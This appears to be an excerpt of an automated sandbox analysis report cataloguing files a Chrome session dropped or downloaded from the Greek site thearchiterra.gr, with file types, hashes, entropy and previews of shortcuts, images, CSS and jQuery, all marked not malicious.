                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I_Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V_Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V_Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 09:05:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):3.995785239694127
                                Encrypted:false
                                SSDEEP:
                                MD5:201A24F235D3888090E20980A7B00860
                                SHA1:FCF67483CBB49AA2C37FF3E600D91879A3BC52DD
                                SHA-256:8F963C430C30C61B66DFB04A9C14B27E8376F1881E87A54CF3A82AC214FA93D7
                                SHA-512:BED6493CE5BAF99BF95F62328FAA0CA2FF2F01BB440C04313299B84069C08E900BF9F00E3213D010C4E94CC63185508849D4A92C8D41DA68CF9522744B1BD3D2
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....Q.Ed|+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I_Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V_Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V_Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V_Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 09:05:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):3.983390268279031
                                Encrypted:false
                                SSDEEP:
                                MD5:6F06B264DD1CC92452FE209134C05914
                                SHA1:968EB2AAB16437E1BFD57D4723AFA019D02C6D52
                                SHA-256:D32BB4E2882B3C8D027A8EF424D506BCB8E58BDFA32E91BFA8BA77FBA59B722F
                                SHA-512:6595865BED589308FE91C6D0794154C0DCFD5C9F53828B897D59634D55B4F7E197F482AC9A67765EAB43141D5D1CF3DC9C412F5C3025A6138F035349BD770A1F
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....&Sd|+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I_Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V_Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V_Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V_Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 09:05:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2679
                                Entropy (8bit):3.9930567193608826
                                Encrypted:false
                                SSDEEP:
                                MD5:0D55C4BB0D1A56E689064B4D3748CCCC
                                SHA1:C9BE76A0318AA4ADF7D711F41DE661457DA59722
                                SHA-256:2804C831BE9CCC952456363C19A2098C5ED9188E14A0EBBEF03F26FEAAB830F7
                                SHA-512:FA24A73493CA83F45B1E116BE06CFE6EA01B67BA8A3151F2188B2BECA6DEAC1454E06308789F7A838BC80E5839BD66E627F7753B659BFB91C01489D487406377
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....3d|+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I_Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V_Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V_Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V_Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, datetime=2022:12:08 16:24:35], baseline, precision 8, 650x450, components 3
                                Category:downloaded
                                Size (bytes):57561
                                Entropy (8bit):7.603592929333515
                                Encrypted:false
                                SSDEEP:
                                MD5:8CE4569D1C602FBA421F0C6E74DB134C
                                SHA1:83A425A871F2F115F37734CE9BFF7AC860B4A20C
                                SHA-256:ECCAFDB89AAE13E3E458C6ABADA6BA52C3DCC4FD77B0AD01336E91FA5D5DB970
                                SHA-512:8D91BB41A8FD3E7CDCD15368A68BE4F6D9798E8C98FC186E0F7ABF095D12C81776951931FB019CFC44B3CCF910CEC799CBF111D03FAF858E88FF66DA6669EC66
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2011/12/REDEX.jpg
                                Preview:......JFIF.....H.H......Exif..MM.*.................J...........R.(...........2.........Z.i.........n.......H.......H....2022:12:08 16:24:35..............................................Chttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmp:ModifyDate="2022-12-08T16:24:35+02:00" xmp:MetadataDate="2022-12-08T16:24:35+02:00"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="produced" stEvt:softwareAgent="Affinity Designer 1.9.0" stEvt:when="2022-12-08T16:24:35+02:00"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (24504)
                                Category:downloaded
                                Size (bytes):24505
                                Entropy (8bit):4.859840684634446
                                Encrypted:false
                                SSDEEP:
                                MD5:7C073B910D79AD465DCFD1894CAEF986
                                SHA1:526C28D076C1AAAE387CDBBF04CB2E64B13B29AB
                                SHA-256:2428388EE7FB9C89FDFD1191A1FB4A45794D7FD64777ECFD9BC4C06052A17522
                                SHA-512:C5C4B6717EBD1CE39DE039E0D012A5151F0FB07D652540CCA5818BDE11043EF18C701015BCA23832233D6EF9229F8B1642FD37BA1D39C4A72B94930CBE67DFC8
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.0.4
                                Preview:#sb_instagram{width:100%;margin:0 auto;padding:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram:after{content:"";display:table;clear:both}#sb_instagram.sbi_fixed_height{overflow:hidden;overflow-y:auto;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram #sbi_images{width:100%;float:left;line-height:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram .sbi_header_link{-webkit-box-shadow:none;box-shadow:none}#sb_instagram .sbi_header_link:hover{border:none}#sb_instagram #sbi_images .sbi_item{display:inline-block;float:left;vertical-align:top;zoom:1;padding:inherit!important;margin:0!important;text-decoration:none;opacity:1;overflow:hidden;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;-webkit-transition:all .5s ease;-moz-transition:all .5s ease;-o-transition:all .5s ease;transition:all .5s ease}#sb_instagram #sbi_images .sbi_item.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):295148
                                Entropy (8bit):4.885465470575592
                                Encrypted:false
                                SSDEEP:
                                MD5:9F3E8AD0849463EB7C97BF92D3E5993F
                                SHA1:AE9197AE679D0AF6CFFD1FEAA3674D5519BC7B08
                                SHA-256:659F3C0384E3AA6866E25F4924D97C1BDA56AC23C62BA8DDF51D349F44B993F3
                                SHA-512:1330047D0A2BB7DC9137C3DB6EEF4D7C5F73CFD4935CCBEA8F074872EB1BB2DB01A0676238A4F5BC91E2F9C53181E9E5DFB003F37AD1AB046BDE6C264DEA601E
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/assets/css/brok-core.min.css?ver=6.6.2
                                Preview:.brok-core-page-inline-style{position:absolute!important;width:0;height:0;line-height:1;display:none}.kc-elm.qodef-shortcode .fa,.kc-elm.qodef-shortcode .fas{font-family:'Font Awesome 5 Free';font-weight:900}.kc-elm.qodef-shortcode .fa:before,.kc-elm.qodef-shortcode .fas:before{font-family:inherit;font-weight:inherit}.kc-elm.qodef-shortcode .fab{font-family:'Font Awesome 5 Brands';font-weight:400}.kc-elm.qodef-shortcode .fab:before{font-family:inherit;font-weight:inherit}#qodef-back-to-top{position:fixed;width:40px;height:40px;right:25px;bottom:25px;margin:0;opacity:0;visibility:hidden;z-index:9999}#qodef-back-to-top .qodef-back-to-top-icon{position:relative;display:flex;align-items:center;justify-content:center;height:100%;font-size:20px;color:#fff;background-color:var(--qode-main-color);border:1px solid var(--qode-main-color);overflow:hidden;transition:color .2s ease-out,background-color .2s ease-out,border-color .2s ease-out}#qodef-back-to-top .qodef-back-to-top-icon *{display:block
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):12385
                                Entropy (8bit):7.80550051815858
                                Encrypted:false
                                SSDEEP:
                                MD5:9614093BB1E3B9AC6525C96571A9BDD0
                                SHA1:A3044D823C544D68EFE9FB6ADC8ED5DEE9255840
                                SHA-256:47BDF125FB34A9F1427E62BC92F1878D534C61F060E3EB064C58C3DF8703526A
                                SHA-512:B48A5EDF6D6589CCFF3F2E5CD3ADB58FCE91DE1AFED69D821267D76D5FC425C3BA49B95CA1BD887440C5A0D84D8777F0FC4E0F061D63ED3DCEA72484196E82A1
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............,T.....sRGB.........pHYs..,K..,K..=......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2022-04-15</Attrib:Created>. <Attrib:ExtId>491aa639-d1b9-49ee-8619-d934ce0b547b</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>The Creatives</pdf:Author>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:CreatorTool>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 1536 x 864, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):152164
                                Entropy (8bit):7.958904843342326
                                Encrypted:false
                                SSDEEP:
                                MD5:957A731897DD05220B6EA5E21863F790
                                SHA1:1BAF252180E85BCC52B92927DAEF8AFB5707BC78
                                SHA-256:8C43949CA11300B2B27751E093775DEF4C30729F00A11CD0A3BC77277EDF70DC
                                SHA-512:536013503444C8F2B5C4ECA8255F15E8598BCAFDBAD5EC52D43190F0C29FDD03346C885DF54E27BFA2823602ADCE880D6651E44E238B02827B5FF70F8A761A0F
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR.......`......"......pHYs..........+.... .IDATx...y|\U.?..9..=M...Z(.,....ED.ce+"..(.=.R..7.PY..."<.>Pv.d.|..m..R.).,.e..Y...$...s~.....t..&7....~.....s...{................................................................................................(.........../..$..z.y.-[...C.......`..MMM......h4.^Gee........p....$..*++..........`0.. ...l.[[[{|.^l.-..EEE......>.g./e...YF".................&.X....4.N.....e..............|.../F..e..;.u.x.a.......~.2d.o...2..R\\....-..WYY........;.;..o.>.-o../**....X,&.{.t.k.Le..]<...._5w...................~z.E.......H$....`4.-....lkk+v.K)M..X,V..B...a*.T.u)..B:..@).B^k.,of[F.a...!.kY+.\Pk..B..tZkK....]...y_.....@.r.+..T.*c...k.})K6J)...R.^./..+......f~..>.......c.[>.o~=v...HJ.......G~.BX..:.....{..V../un.v.3.....;.K..o.>.-o.:.....w.XJ.....@.C.....s..|,..m.JJ)m.\..Y....B...eYQ.4.......y....*..~...#..X.u.a.H$........m...K).@ ..m.....l............e]0.D<..a..............`*M<.....{....q).....
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=535, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1024], progressive, precision 8, 480x246, components 3
                                Category:downloaded
                                Size (bytes):65319
                                Entropy (8bit):7.808152267969283
                                Encrypted:false
                                SSDEEP:
                                MD5:F25A3FE96C6057F654CD42953C26EDA9
                                SHA1:C4ED061BC8631A7625C85799A4D33F62552B8A90
                                SHA-256:C3D54801C3E3257A53132E6B04F6583E4655A39A7948FF1A0159BE98BD397B7B
                                SHA-512:C2709C8F02610D81FC692A017903173F7CBB71A71488DD080D53461B6573637797A4C7CCB9B8A006E5BC665632FAD9823D8C5B5F5487F0C28D582286D58AD172
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/05/masoutis-1.jpg
                                Preview:......Exif..MM.*.......................................................................................................(...........1...........2.....................!...........)Q...........Q...........Q...........i.........@...x............'.......'.Adobe Photoshop CC (Windows).2022:10:13 11:42:03.........Photoshop ICC profile............0221................................................................................(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................R...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw...........
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (5392), with no line terminators
                                Category:downloaded
                                Size (bytes):5392
                                Entropy (8bit):4.571063312344711
                                Encrypted:false
                                SSDEEP:
                                MD5:12351EDE0A5EA988B8BDD4796EBF6885
                                SHA1:1880ADB713DC39D583E9D8AFF6ADBEE15F335220
                                SHA-256:5C3D0D91F55A33EDCA169460750F3BD080A47A207ECFDC46A616EDEF0A6F5F73
                                SHA-512:0C88FA55029D2371363DC35F1A1DD975E66B3F7A1FB17377265825B7886BCBDF0BD41788EDB87777967368D295E6169E1E39C038C189772CF0EE35B92CFC889E
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/elementor/css/post-80.css?ver=1716288360
                                Preview:.elementor-80 .elementor-element.elementor-element-4f37949{margin-top:0px;margin-bottom:0px;padding:0px 0px 0px 0px;}.elementor-80 .elementor-element.elementor-element-26be4e1 > .elementor-widget-wrap > .elementor-widget:not(.elementor-widget__width-auto):not(.elementor-widget__width-initial):not(:last-child):not(.elementor-absolute){margin-bottom:20px;}.elementor-80 .elementor-element.elementor-element-26be4e1 > .elementor-element-populated{margin:0px 0px 0px 0px;--e-column-margin-right:0px;--e-column-margin-left:0px;padding:0px 50px 0px 50px;}.elementor-80 .elementor-element.elementor-element-49bf37d{width:auto;max-width:auto;}.elementor-80 .elementor-element.elementor-element-81ff27c{margin-top:0px;margin-bottom:0px;padding:132px 0px 0px 0px;z-index:1;}.elementor-80 .elementor-element.elementor-element-f27ecdf > .elementor-element-populated{margin:0px 0px 0px 0px;--e-column-margin-right:0px;--e-column-margin-left:0px;padding:0px 0px 0px 0px;}.elementor-80 .elementor-element.elemento
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (6251), with no line terminators
                                Category:downloaded
                                Size (bytes):6251
                                Entropy (8bit):4.720135625909861
                                Encrypted:false
                                SSDEEP:
                                MD5:13B0F16D8F210A75D26F6C2860618E5E
                                SHA1:5D82EE5A91EFA529689F56AD5DFD9FE8F8FE0929
                                SHA-256:8D342D5AC69BF8F7DD6100AE0F00DAA664C2819E19B81D53C0AED981CA9D9B02
                                SHA-512:CD095A1923C3C4D5E10B58D99ED83FCD798A7AC026E03A79A22439B3C44BB6E7D90246947F0212659D02937FE5C0DF154CF2BACB52064376B65F64A6EA4C56EA
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/plugins/elementor/assets/css/elementor.min.css?ver=6.6.2
                                Preview:section.qodef-elementor-content-grid>.elementor-container{width:1100px;margin:0 auto}section.qodef-elementor-content-grid.qodef-extended-grid:not([class*=qodef-extended-grid-disabled--])>.elementor-container{width:100%!important;max-width:100%!important;margin:0}@media only screen and (min-width:1441px){section.qodef-elementor-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1440>.elementor-container{width:100%!important;max-width:100%!important;margin:0}}@media only screen and (max-width:1440px){section.qodef-elementor-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1440>.elementor-container{padding-left:0!important;padding-right:0!important}}@media only screen and (min-width:1367px){section.qodef-elementor-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1366>.elementor-container{width:100%!important;max-width:100%!important;margin:0}}@media only screen and (max-width:1366px){section.qodef-elementor-content-grid.qodef-extended-grid.qodef-ext
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):1560
                                Entropy (8bit):4.818383450473617
                                Encrypted:false
                                SSDEEP:
                                MD5:5AFE14C8E689BE234976777D77FC8115
                                SHA1:8F28900E4CE2161B190DC2EF7E7B04C2F38B0B3B
                                SHA-256:FE3C2960C8DCE8CC7453C41052629819CAA2B10571CE1050115595D76D9B6695
                                SHA-512:5573DDC91047CCD51D794601D63703011C9E9E6F8038A4028EA7F6AFEA99B2CBD276E75B4983AC417737676D411AE8D51323998C296FDF284973EA2163B20540
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/elementor.js?ver=6.6.2
                                Preview:(function ( $ ) {..'use strict';..$( window ).on(...'elementor/frontend/init',...function () {....qodefAddonsElementor.init();...}..);...var qodefAddonsElementor = {...init: function () {....var isEditMode = Boolean( elementorFrontend.isEditMode() );.....if ( isEditMode ) {.....for ( var key in qodefAddonsCore.shortcodes ) {......for ( var keyChild in qodefAddonsCore.shortcodes[key] ) {.......qodefAddonsElementor.reInitShortcode(........key,........keyChild.......);......}.....}....}...},...reInitShortcode: function ( key, keyChild ) {....elementorFrontend.hooks.addAction(.....'frontend/element_ready/' + key + '.default',.....function ( e ) {......// Check if object doesn't exist and print the module where is the error......if ( typeof qodefAddonsCore.shortcodes[key][keyChild] === 'undefined' ) {.......console.log( keyChild );......} else if ( typeof qodefAddonsCore.shortcodes[key][keyChild].initSlider === 'function' && e.find( '.qodef-qi-swiper-container' ).length ) {.......var $slide
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:downloaded
                                Size (bytes):87553
                                Entropy (8bit):5.262620498676155
                                Encrypted:false
                                SSDEEP:
                                MD5:826EB77E86B02AB7724FE3D0141FF87C
                                SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (43361)
                                Category:downloaded
                                Size (bytes):45219
                                Entropy (8bit):4.672787691053439
                                Encrypted:false
                                SSDEEP:
                                MD5:8C11D34C99D4F998621919F6BB08695D
                                SHA1:627DB3A1CCBCF9AB41E3473DFEA8EBDB003AEE64
                                SHA-256:49D470CF6A1752308180DC337C38BB0D1B94775C9F7078326C36C2CF809A67AF
                                SHA-512:0DBFBF337A8162F02BE805F4056F68F6974472199B5624D2C8BA0A5D4A32D6B44FBF7211905B2EAD7ADBD425678688338CC2E90205CEC92E005439C7F4A3FDB6
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/ionicons/assets/css/ionicons.min.css?ver=6.6.2
                                Preview:./*!. Ionicons, v4.5.10-1. Created by Ben Sperry for the Ionic Framework, http://ionicons.com/. https://twitter.com/benjsperry https://twitter.com/ionicframework. MIT License: https://github.com/driftyco/ionicons.. Android-style icons originally built by Google.s. Material Design Icons: https://github.com/google/material-design-icons. used under CC BY http://creativecommons.org/licenses/by/4.0/. Modified icons to fit ionicon.s grid from original..*/@font-face{font-family:"Ionicons";src:url("../fonts/ionicons.eot?v=4.5.10-1");src:url("../fonts/ionicons.eot?v=4.5.10-1#iefix") format("embedded-opentype"),url("../fonts/ionicons.woff2?v=4.5.10-1") format("woff2"),url("../fonts/ionicons.woff?v=4.5.10-1") format("woff"),url("../fonts/ionicons.ttf?v=4.5.10-1") format("truetype"),url("../fonts/ionicons.svg?v=4.5.10-1#Ionicons") format("svg");font-weight:normal;font-style:normal}.ion,.ionicons,.ion-ios-add:before,.ion-ios-add-circle:before,.ion-ios-add-circle-outline:before,.ion-i
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):31
                                Entropy (8bit):3.86469832616696
                                Encrypted:false
                                SSDEEP:
                                MD5:2D7D30EA1C6F925302D2C3ABED382951
                                SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                Malicious:false
                                Reputation:unknown
                                Preview:{"detail":"Method Not Allowed"}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, datetime=2022:12:08 16:24:57], baseline, precision 8, 650x450, components 3
                                Category:dropped
                                Size (bytes):26222
                                Entropy (8bit):7.016971667860962
                                Encrypted:false
                                SSDEEP:
                                MD5:A242D08071FF66DB295C117C399C5BE9
                                SHA1:0AFE3518066E7B2BD0A4EA3693FC002E2BF32F4D
                                SHA-256:063F59F449A3868F7C04C5129B0FE8AD3D6097B1DE3DA21EBF4F7B39AA35467A
                                SHA-512:5A76E6CC1DA2554D317111DA86325F4F23FB17A53E9253C345F58BD2466A056A20AF1AFD7225E5C3E4E2257627858DE0F7505CE1AF99DBEAE06796F6974FC58F
                                Malicious:false
                                Reputation:unknown
